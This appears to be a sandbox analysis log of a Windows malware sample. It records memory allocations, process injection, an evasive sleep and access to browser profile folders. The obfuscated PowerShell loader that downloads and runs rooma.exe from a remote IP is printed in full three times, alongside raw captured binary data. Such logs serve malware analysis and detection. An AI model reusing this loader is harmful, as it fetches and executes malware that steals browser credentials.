allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04999000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0499a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0499b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0499c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0499d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0499e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0499f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2104
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description netbtugc.exe tried to sleep 160 seconds, actually delayed analysis time by 160 seconds
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file C:\Users\test22\AppData\Local\Chromium\User Data
file C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data
file C:\Users\test22\AppData\Roaming\rooma.exe
file C:\Users\test22\AppData\Local\Temp\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
file C:\Users\test22\AppData\Roaming\rooma.exe
file C:\Users\test22\AppData\Local\Temp\sqlite3.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1460
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received Áè@ҋÁ+ÂuAù')|ݸ?Å%C÷îÁú‹òÁîòuí‹M ‹u¶0¶A0F¶A0F¶A0F덤$¸ó§-4÷ïÁú‹úÁïúuí‹_^]Ãñ™U·¿K-U‹ìƒì¹kS3ۋÿ¸8pà÷éÑÁú‹ÊÁéÊuë3À‰Eø9E†ã‹MƒÁV‰MðW‹ÿE ¿vW‰E슈Eÿ¹$¾§»çb¸d4L÷ïÁú‹úÁïúuí¸¶¾ ÷éÁú‹ÊÁéÊuí‹Uþ‚¶‚zø¶‚ ¶Áˆ‚ ¶ÀƒÀÂPW‰Eôè!ƒÄ¸D&¹öd$;ñLñHuø‹EôŠ¸…ëQ÷ëÁú‹ÚÁëÚuí¶Á‹MðŠ2Eÿ‹M숋Eø@‰Eø;E‚,ÿÿÿ_^C‹Ã%€yHƒÈø@uCû”/|æ[‹å]çÈéhó,!ÏПìU‹ì‹M3À8t d$@€<uù@Pÿu Qè¾òÿÿƒÄ ]ÃF!ÇdRëåÕØU‹ì‹M3Àf9t I@fƒ<AuøEPÿu Qè‡òÿÿƒÄ ]ÃÌÌU‹ìjÿuèÃ÷ÿÿƒÄ…Àt‹@]Ã3À]à ¸U‹ì‹M WŠ‹}„ÀtV‹Ñ‹÷f˜Rf‰Šv„Àuï^3À8t I€|@uö3Éf‰ G_]Ã(!Ÿ9ÖýÂ6?áõ:U‹ì‹U ‹EV‹u…ö~W‹ø+úŠ Nˆ R…öó_^]ØçóY8YæßÃU‹ì‹M…Ét¶E iÀV‹ñW‹}Áéó«‹Îƒáóª_^‹E]ÃÌÌé«ûÿÿš»Ü¡Å/௑-U‹ìQV‹u…öu3À^‹å]À~u2ƒ~ÆFt èèúÿÿ¯FëèÝúÿÿ‰FÇF@]ÇF b"ÇF *@‹N‹Ñ‹Á%€ÿÿÁê3ЋF5Aýÿÿ#Á‹NÁàSÁê3ЋًÁÁèã>3؋F$5A}G#Á‹N ÁàWÁë3؋ù‹Á%ÿÁï 3ø‹F5A}Gÿ#Á‰V‰^ÁàÁï3ø‰~ ‰Uü‹V ‹òÁî‹Â%þÿ3ð‹EÁî ‹H(ñA}ÿÿ#ÊÁá 3ñ‰p 3÷3ó3uü_Ñî[‹Æ^‹å]ÃÌU‹ìSV‹uWdžØdž̿‚¸ødž칂¸ødž䱂¸ødžðÁ‚¸øÆÈVè¹þÿÿƒÄŠÈd$¶Á;E r ;E†î…öu3Éëç€~u2ƒ~ÆFt è’ùÿÿ¯Fëè‡ùÿÿ‰FÇF@]ÇF b"ÇF *@‹N‹Ù‹Á%€ÿÿÁë3؋F5Aýÿÿ#Á‹NÁà‹ùÁë3؋ÁÁèç>3ø‹F$5A}G#Á‹N Áà‹ÑÁï3ø‹Á%ÿÁê 3ЋF5A}Gÿ#Á‹N ÁàÁê3ЋÁÁè‰E‹Á%þÿ1E‹F(Ám 5A}ÿÿ#Á‹MÁà 3ȉN 3Ê3Ï3ˉ^‰~‰V Ñééÿÿÿ_^ŠÁ[]Ã4xW(ãƒNÙU‹ì‹M ‹UŠSŠˆˆ[]èY™Ðxpã±F;XP̆H£€ÑÂbÀžVwN¹üÎÃÑu쮂€PÂ^lå ó÷ÉÍÅe1éÈíØìÙÈëx« Îúx #‘*,>uÈ'Mè å5›Ãá(–š‘ã@hE™‰÷ gýmNKóCtÍ3Ãu,±wzPÌEP|FFn0mFY“ey>ÁË8e*ÈîÖÍD@»>”ùƒ bëúXÖó+qîà¢R·–ûcyÂíó”þùþ˜lş†_¹^†9'׃L£oÆ|Z.®Ò ’§>PÅ¥>îft¯0ýèÙm`uSâ@~:¡ÊØ‹× fTk#õ+{2ÏyQï8S₥È3 ‘á y@<H¯9—„¥Ád(îÊJM¤Fù[s§„Ñäo²ù&,**y'Lê¼H”¡­;—1^§t.,–Ñ©ï´Fw¬1H€j;*Lïjs‚aá%ÃŜÜ'ú;68žšäiç¿æžpí6…aý-Þ¿®° »d9Úgbœìråƫҍ&çPj±%Xg0÷x‘„MUÅGÝ Q7‡,6U=µˆsô§>»¿Šä* oU˜c -*ÀÀ+tó”¾Ö4w¸à•Ìwg‘H³9iž1¶î=t/€7üq‘é`ÿÝæ¨á¶·yÑó¿úˆÇ=æN“»ßg¶]¥¤—X¦û0g0¹2?*u²Ìž4”m¶Vcóv‰R‹sWE±ÇK(€ÅzÜ>8E)$N/xï‘=t$¿Ü‡Œ"ÂréÐ* hµ7ó§“@o¾’,ë,Ϝ{§ârNåX¡°dœõŒ~ä¬#ž¶U\Þ­ëÈ#|§{ú 8%°§Ò‡·£Ê6ŽwþN°™~7MÊÒ|M.È7‹«Vöz ô‹TÃÂSSøÃ-KfÏÄlQ3gk&·c©i;ê 5G=ŸßòOƒ1L+ÃÌOH!¨º;»j½0²’Ÿ$žd ©¼û(©ª0ÈØ/¶:ÐÅÐ+8ÓAægÑTÅĪ~Q€3Ò_Áš‘KltŒ.¨'¨^ÞoTs#zóƐ˜G›ù'€õD!ól˜r’<ÿÌüîÓ)WÆZkNl…“¡ u'Ⱦ¤{Áþ!…°QBL ‰‹Œk`³Mˆ=ŠdÅbMý•­°¹òÜFKP!ªâÄõAŽÀ™ëk¦|Kc°çÄ—cD›žtUiÅ(Ž˜ÉUH’ (@ ¤m1NY̓!‰ÿîâí?É>ݽ>„¾Ò›§L¢hž¸úÑs\ʀöÊC¿`Rß0FÞ·ä„ß6š}5ÑØÈ/(H_Ð{<ÍteòÞËSaDG'ݯÛKë/g aUxB-‡Îþ€õKÀÃðHß ÝÙxòkõè;ëoÅCˆ¥RRi¾¢("ƒ¢à֞ÿ T«^Är ²ë›/rç‹êÀè:¾Ë ç )GH2Ôa¥.ò&+ó⎉Û-¥ÙÜ©o®©åŸŒ 9iÿ(!+ k¡­­o†©9[NY)?ú»ØZº£6¸…¦ a/9ŒaâÁ0RýUºFöþùÛ'F„Œ2¿SÓ1­#òàîT¯kÀ5‚”q¬©ÖÿTÛs}—N‘÷ÛúU b ™†ÜàsëJn¯ÐÊ;˜šŒÊtêóá§àœav¤¤ØÃåV}ò4–gñƒ¥×›´Tòx›êY`ZFæÄ0æmkAfä¦;ÿ/ $tÇL3Œ¡/Â' } ` :òT<>ŠX,ð/½t~9ìóµ`;ÈÙ#3˜®ÌÙ1îǎß*w(Î0}N81nbÈ,ÀiÓ6·séîã7„<&a÷éö ^/“Ÿ@¡† >ׂKÔjJˆ{BÔôïÛ½—V˜~Æz„À¦wE°ÙÃڑá~n˜Ó˜Ú5Vh°=Bsg/Y¼þ:j^BZ[۝³–[•KÓry.‰“; G£ãL€7:‚[T²¾‡´§?'o2E—š¥ã ‡DŽ¸œ|eÎiG»‘:»N¸´ËqçeãT¡2Äw–Æéκ­~ktI'¡•,WXåh‚/ÏÁ øÎS®Z6—ó4=IBð o5,<¸|´…7^’ü'ºL. Çp»Öâ—%¦»‘ãVÚ+|`çéò´ÞÈ3žän…ÒOH\+ÙBößá‘'èR>HS6¬@QwŠŠ}™ŒµVŠŒDBÕÞüÁŒ„K–צBl8OƒÕp"L’.A3¾û½æ;¢õ–1x‘qñI"ÃY|ìMªüµéˆöNªqƒ–€õV+C·E¦} zÑï­îyou”Nö¯rGǝ«¤¯ãìûJgg1Ò6·á«|OgtCBæxqíÅTì,œ`×ž!T|ð甊2=€çʊ™Ä;{9_xÄE¶}‚Œn Í>ÎbúŒâåæ6ˆŠ¿àX<â6Jq[xL{± Áécá«$>ô¿‡ÔKw/Xž¹ò{£lDîT}§ÐÈþ\•Óm€I/ÜÁa¡[ûá„p$ñFïÆäÝTvÁé¹%7‡˜ä‚DÃ}=8AXAu;?.‰\slà?Ð*èGÅxü©š|TL¥ÝiRÀÒ_ןZ,á5Fš÷åÿð[ÙVŸWQSw 8]^Ž³¨…÷Yq¨õ׍®ë# |CÑXaïüuÒPÐé‡7àÅÌ_çq-Y’äÎ8 à+˜ŒÃ~®ë팋\ Í`Y¯ì+ŋ+K‰ã
Data received ³íRHPðëAcÔàˆW6ù{Õ½ŒT÷.~a¬¨¨}`CÐAùsR%«v пSôO $®ÿàüRLØôdU„Ö¿…÷^GîdËcã :æH¡%¹S+YÝiÜC–è’u¢KuûcßÃEÿfÝ ñv꘠UØЊ-¡” ýBÀ—ãúzì樲9ï?MBïdòí‘ÞeKÆ\7'›JnŒusJ’ˆÓ yO¨ó¥X7> ›Hzœ  –˜hj VõORàïÛɅÏ”gƒã·Tfó@„:;ËæX’’CvÖ ”œ%5gêjEÌcõé¡çÊڇàM™h~ÂäQ°èÿ R:„ º¿êOV-–47D5 G;»Šp9àtñzeÖ[ã»%˜ĸ·TRÒycgðÃÉ}6w¥8ýš« ärÔéSWpå×uÇÞ²lCñ3w§åÙ° ‡ž‰ìS®á 5ˆ†ÈëƁ™¡™I.³Ø~-ÛÅJ@ã±æ³yi¶Õ*‘ýßp@ùäš\ÿìÇê´eu ò¸Åc£m‘¡ïܧ~jÖÃôK—|["ÛXúem/3ÌAcFž!î)÷_îº\¨|¤W.ÌÉç'$Žiô}. /åû,½Vç²AÀ3ý¦ð¬k¿>Ø47«%m­÷úW ÐGhժɕióê+‘T4} ™`k¡0,Øñw1‘^‹éð°Û~Õr# w[½ÚuÎ}†‹†A ìerlŽ£yÿ2›^DÍb‘ž ±„ÊÞÿäºÖ°ZÄí—/›(ÆU丳<r<L$6j­,`9]·ÛwuW<æRö£ìªç‡cô5ÉfFžW5ÏÖ®¨M@ɂ6”/vô+WÉ`¨±4ÓŸÑC€]F ]™ô« šÌÕ<þí‡Ì•uäâÁ?=Kt.p-Û§O—kf©\å`ôæsX •\úIb[Õø'öæÀÏ3Ý9ŒôÊλR¦ÜEk±¦-</Ïfñk‹v—dzX%Û[3þð݄l¼"º¡SrÃóÀoUE`Mýރ\wA¹v0|%ùEC~hµó›"[ŠAÚ¢ØÈ°¤$61j`7½£80ƒá2÷ßVƒF¦K:Ðf1 1Ĩ›aWíS;ÆsÂМ½ŸºFÖN‹5VÌVº”M«P–<;9.4ŒWZJ¥îxÓƒïgí?G?sВÐ.J¾ô³Ûœ¥Ñòì×y_l½ì±®úK¶˜ó1çbP€Î`÷'æ4†~2~Ý Xðz„-ÁòÒÑ/ÃSˆlÓJ ÝV•Æ„@ÿ0~ÎO;y»ú§y‹›`Žpóñ­Ñ𢌨‰³¬ØæÁŠ¦µT=Ð7›Š2‚Ñßù9”´¾çÏÒv®+Zr§à5S3³w}{§‹ØTpÍãx?^–ø‰l÷Ęgžeìá`$ÿìý[½Z‘º&?oy Vþîƍ€¾\'‘8¿G3l¬Õ6Ô¥¤1¡Ú\Ozϙæ}BG²æ×®8DæòÀ¢Ýü¶3çõJ☠]¾@‹dƒÝ\*¹Ó²@" ½‘yÿÃõug°Š{_nÇÎÊJ oècµPïÍ͍â .ù'g|Ž% é9Ík§ÐZnfÇÝ­³5šŸl?0É»w2]鉃֞^…f©¾/…‰âù!­kÝ'=‘Xòµ-,ö7~`aŒxÒ@úŒ Ù¬c°ïq°vˆÆÎs}kójX/ù¿Ï¥iª)ò¡ÄýÄZS:bu”Ÿ¨ú̇÷¸mÃ÷“+¸:<§Š/C˜PîTU֓¢?ÛqD”êmR>r]T¡å^ÜÊ „=’ÏòЎeÆ8__[}Nôã Ð rA ¼ªˆJùkÙ=œ‡ #tòvÓè¥çLÉSfîÚøÏ=éÜ:ùÍHœ¬-bСòÿŒ#žx@̖ŢÖ?ÿ¶ŠÃÛv‘¾ý?Щ Ó"ÂmÊtJ¦|ñù„èܾ|ô¢×pæ2íÁ Ÿç²Ù>¢aø „ÝùT¸‚ZП½µ‚dlÖêWrâïšy{¤`µjdiÙ ›© bó >I ¶2÷´\g‰©#n¬$ÔT¶ýPÈg.üÒº~t¿îCàð•e¦RÙ2Uõu·w2鎈·×ä>|ÜWä2_•«y ƒV ËÛ\¸IòlÌ4‡Ü.GÃ@QMQ| ˆåÚ0jcÐÓÒPPšÞÆÕ3ç<x»]ƒÙ<ۂDGF {#ß½´”Ðq? ‚Àð­éZ´P·,²³ÍuµƒXEþÒS²žY/ÄLÁÿãÝñȇpTrüá¼Y25÷–§5ÏËug ¬nåÙ:ç²nNq³%1Ú[Ê&$ \í_(${ %GÁ€—§Çن£þ—Ù?´nÖ¸h`f4"1¤Iæ0†ù¾N@I  g•á3Œ5{û9±Ø𚞨™H Œ^QVÅPñ¡9D(à³ ãÙm±aŒô¡ãàoø9-Ñ$u`;*=óçR± ¡fúþEáGÆ™oŽsjÿÁ³¥B%³¶úžÀfˆw\ýÌ}۞ªÛ‚öq]úÅi„ ôq<¶gIê…oëu·•›öå¿üúWè9)  Þˆâ’ïû|˜sÿ³$‚9ï:§p󥚲˜c&üƒ’š Âuç¢l}Øb‹üN(°XIԗ؉BF>v¸ˇFÃA'Ùß8íq§!>ù’[[¸Ñ+Q“[Ԗ^’¸HÍÂ^ׄ2z†ÖsThy*DÔâ?q· · ¾EÉ!˜=s±c‘Iaޞß÷ÌšˆCzMô§¾„´¤è(4,Ç»y ¬¡š<‹…ïMŋÖBÛuìÇÝJX?oSªö÷‡·XØX“Õs")¦Å!•³¬2tIûƟÍގäòÌN´®žµbÉ}CW6Ô¥ú•yò¦Íú¬ûŒå€8îG]$G“lš8H]þíɊçâhÕkºwRax²„½îæ$ú«ÐߦÖ%9˜³ÿ+¿~ “•®Z›Ê®FLL°Êœ&1±:mŽ¼@ݹ•Ý`à3ºÈ- y° ›iðÉð„¨ÙΗ¢VÁû~궣ýÅöë¡ 1¼ì>çßrí„qôõKwî2q®½xö:F „•C†'bxã<€¯¿¦ï{'PSÛ`[LI>v0TeØ?I(ŽÃ#4b ›@õÉǏjtÀsAÙ®ÏÊ2 Úéä›ÓI NêÐjþ-'_¨^›_ʼn‘8¹E=ÿÇ¥—iá^Ÿqƒ¬ß†áZKÚY=GV,]þq§ŽÎ*|3Š¤Æ†3‹ÇóÂÒq\7Û•fYólV&h  ˜îê4L‰øXŒè‡Æ,E8§ØOÌ5Æ0aã­r!ô‹)†O/[ ®C°`)Áý ¢}äN=º^¯b¤¦Ü€”fÆð¯¬R#™…Ķ÷•—L&/-$³¦ÛC¦ùŽ¾£Ï|µ°g]û  ]¶·òí4Sôžܸ±p¨kÛ*vS8<}O> N3Q@ù)ÿÎâÀ´ÙN£(Í4†Ðù’/^Hd®ØU3GáB48Ÿ×8FÔØFFOëeÏÝã3iԇ•n ѵ!¬2m±ò#ÍF I…°+é¿ø^}Ç)×ÔF>Qb HyåÒö1•ïù› .ú‡]Z₠ò;uٍ]°ÂÕ(ÖUj#˜0aGdj un“×öE…|ï=ܧ[vy¢Ë;ÜBæ“R2—oçŸì/x¨Nj7ãO·cû™">C §^;1ŒÂ¡çŸ@À]€T>§ËxcwÉ?¹Í<*àêZD…¼V(Ê.½(Ýsœ‚ÄQ`’GæF£Žµ¼øh¦§GcJ›î°¥uePhãIÑÊLK™U‚§…;&e¾d{é±;öWugÓ]¶yç`ß` ×“ƒDMdEg‹Éˁí¯U„פ `îõ¼Y‹÷5”a+æ8¢:3ŠL$Ï<T۟#á-¢¿ØÆÕbŠßý²”Ö7‘'±ûa¤,ôsã틼™¨<À¼<?(Lj SD‹ #!täˆî‡N¸®9ŽÓ0:p÷+zòm;ó ƒã'ÕÁBÿ¥lõ™rÿ£°ç¤(I¬ ž²œg@G—”¬Îå(Ôª:Õ!Hôží2æ …;cIXJëÂ=×V­ñ•Ížôc³£{Bs˜à«÷lE”ƒŠ{ìTß)èI¤j‚Ãæ돘ßý;Z<@ƒmèã'®ìøzélTPÈ!<3¦UM0 ¶±1ÀN¡o9 Ž8ˆ¸VA­n«Ÿ9šBbíý]+Š »'ü˜jp¶ §ˆ>Ô0Á¤À¿FÝ{,l›Ê×G/èpáQP ãbk†•þ¥¬&¡~Ð8 lâ†dõPþs½z²Ëi—¡ïim!Ûîf ®*ü2éà^ÃAE˜‚ ÷#w2œX )€å{Þõc‰ upÚ,‹*/#ªÓ씀òf§hýÅܹ´k9Bñå)žŠ2p‘³SAÌ÷ƒàÚ¦!1ƒåŒÜQà8ôý§£) `¹lüO’WÝËxoÆH‹=Ô"ółlø„sN˜ôŸïÉ2{nþ'|šBj8njl~«EÂgégŸR-ídŒ²4%W½’>ÀÞãP},|°±äŒ3O "Âpi> èÑց®ˆÕЇkŽ~ ,ߨ²ÃXm¼[ß/]DãË*? îÿú×jÅJDÄND…äÁ@¿úíô 4TÄ@¦öXkT¥€)X0ùςÈð\‡P”Üd%¼×;ÁÈp Y³ù„V[6…œÈ]ÂÏØÀ8Èj3PŒúâbO±c½›Äñˆ&.á ÛDz<|û†&ˆéUg{NªW³Û‚²µóâÚeI· Ó²@¬ù7­whIVÃ{!GŒ¯¯!ÞA¦„|œ´wØCôôK©PO»„é
Data received »€‰Â>íD֑²%·Z9¹ ZSÝ9KÑ<6!‰K韡 ¦a”ÉKñw䎏ná—÷õ›ÿCòø¼µ^¸Éý|¿7è÷EÔŦ‹øžQU<`ïzµHŒ%ÍÍ/nÄosR†0ôèe;ð…ՖgëB\-ˍY@“>˜@ããd71£0é4ʪYX ˆðo¡¡XJ‘}ÄÂtOA1$:
Data received Ð(‡Ù(±ª ÓÚ©ûPÈzW}³DŠÄ‹wî7ŠþmQžŠ}z7¹ÌìëÙðÌ 'Yæ·l`´AÏF‚cyÅøoœv!¥²^—‹ò¶Ý&f+ð\öZªî9Û捉U–Òh xÌ®[ /Uì¥Ö.Öä»ɘQ%Õ罉µarf^¹ä| oþÈ^ŽrΏ¸ˆ c& »z¨à„!µíÜìÈjSñ
Data sent GET /room/rooma.exe HTTP/1.1 Host: 20.86.128.223 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 20.86.128.223
file C:\Users\test22\AppData\Local\AVAST Software\Browser\User Data
file C:\Users\test22\AppData\Local\AVG\Browser\User Data
file C:\Users\test22\AppData\Roaming\rooma.exe
Process injection Process 2308 manipulating memory of non-child process 1888
Time & API Arguments Status Return Repeated

NtMapViewOfSection

section_handle: 0x0000004c
process_identifier: 1888
commit_size: 0
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
base_address: 0x03b50000
allocation_type: 0 ()
section_offset: 0
view_size: 7155712
process_handle: 0x00000050
1 0 0
Time & API Arguments Status Return Repeated

send

buffer: GET /room/rooma.exe HTTP/1.1 Host: 20.86.128.223 Connection: Keep-Alive
socket: 1436
sent: 77
1 77 0
Process injection Process 2308 called NtSetContextThread to modify thread in remote process 2424
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 2686696
registers.edi: 0
registers.eax: 562304
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000064
process_identifier: 2424
1 0 0
